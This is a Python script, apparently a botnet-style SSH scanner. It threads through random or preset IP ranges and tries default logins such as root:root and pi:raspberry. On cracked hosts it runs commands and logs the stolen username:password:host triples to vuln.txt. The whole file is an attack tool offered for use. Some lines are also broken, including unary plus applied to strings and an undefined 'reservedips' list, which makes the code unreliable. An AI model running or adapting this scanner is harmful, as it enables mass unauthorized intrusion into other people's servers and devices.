#!/usr/bin/env python # python root.py 500 LUCKY x 0 # python root.py 500 B 101.108 1 # python root.py 500 A 125 1 import threading, paramiko, random, socket, time, sys paramiko.util.log_to_file("/dev/null") # silents spam of paramiko blacklist = [ '127' ] passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test", "pi:raspberry", "vagrant:vagrant", ] #pastebin.com/S4JutZkd if sys.argv[4] == '1': passwords = [ "root:root", "ubnt:ubnt", "admin:admin", "root:password" ] #Slow but effective if sys.argv[4] == '2': passwords = [ "root:root" ] #Fast but yet less effective if sys.argv[4] == '3': passwords = [ "root:synopass" ] #thefuckis a synopass if sys.argv[4] == 'perl': passwords = [ "pi:raspberry", "vagrant:vagrant", "ubnt:ubnt" ] if sys.argv[4] == 'all': passwords = [ "pi:raspberry", "vagrant:vagrant", "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] # scans all passwords but very slow ipclassinfo = sys.argv[2] if ipclassinfo == "A": ip1 = sys.argv[3] elif ipclassinfo == "B": ip1 = sys.argv[3].split(".")[0] ip2 = sys.argv[3].split(".")[1] elif ipclassinfo == "C": ips = sys.argv[3].split(".") num=0 for ip in ips: num=num+1 if num == 1: ip1 = ip elif num == 2: ip2 = ip elif num == 3: ip3 = ip class sshscanner(threading.Thread): global passwords global ipclassinfo if ipclassinfo == "A": global ip1 elif ipclassinfo == "B": global ip1 global ip2 elif ipclassinfo == "C": global ip1 global ip2 global ip3 def run(self): while 1: try: while 1: thisipisbad='no' if ipclassinfo == "A": self.host = +ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "B": self.host = +ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) elif ipclassinfo == "C": self.host = +ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256)) elif ipclassinfo == "LUCKY": lucky = ["201.13","197.23","187.89","37.236","191.53","161.18","191.53","186.208","1.0","177.137","177.38","101.108","125.27","177.44","179.189","179.97"] self.host = +random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) else: self.host = +str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256)) for badip in reservedips: if badip in self.host: thisipisbad='yes' if thisipisbad=='no': break username='root' password="" port = 22 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(3) s.connect((self.host, port)) s.close() ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) dobreak=False for passwd in passwords: if ":n/a" in passwd: password="" else: password=passwd.split(":")[1] if "n/a:" in passwd: username="" else: username=passwd.split(":")[0] try: ssh.connect(self.host, port = port, username=username, password=password, timeout=3) dobreak=True break except: pass if True == dobreak: break badserver=True stdin, stdout, stderr = ssh.exec_command("/sbin/ifconfig") output = stdout.read() if "inet addr" in output: badserver=False if badserver == False: print 'Executing on -> '+self.host+':'+username+':'+password+'' ssh.exec_command(" whatevuh ") f = open('vuln.txt', 'a') f.write("%s:%s:%s\n" % (username, password, self.host)) f.close() time.sleep(20) ssh.close() except: pass for x in range(0,int(sys.argv[1])): try: t = sshscanner() t.start() except: pass